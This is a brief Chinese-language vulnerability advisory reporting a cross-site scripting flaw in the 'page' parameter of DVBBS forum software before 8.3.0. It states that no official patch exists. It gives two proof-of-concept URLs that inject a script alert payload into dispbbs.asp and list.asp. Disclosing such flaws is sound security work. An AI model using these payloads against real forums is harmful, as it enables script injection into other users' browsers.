DVBBS所有低于8.3.0的版本的page参数都具有一个通用跨站漏洞。
Dvbbs 7.1.X 与 8.2.X 之间的版本中,该跨站漏洞存在于dispbbs.asp中:
http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="><script>aler
t(/liscker/);</script>
Dvbbs<7.1.0 的版本中,该跨站漏洞存在于list.asp中:
http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=><script>a
lert(/liscker/);</script>
DVbbs Version < 8.3.0
官方暂无补丁
暂无评论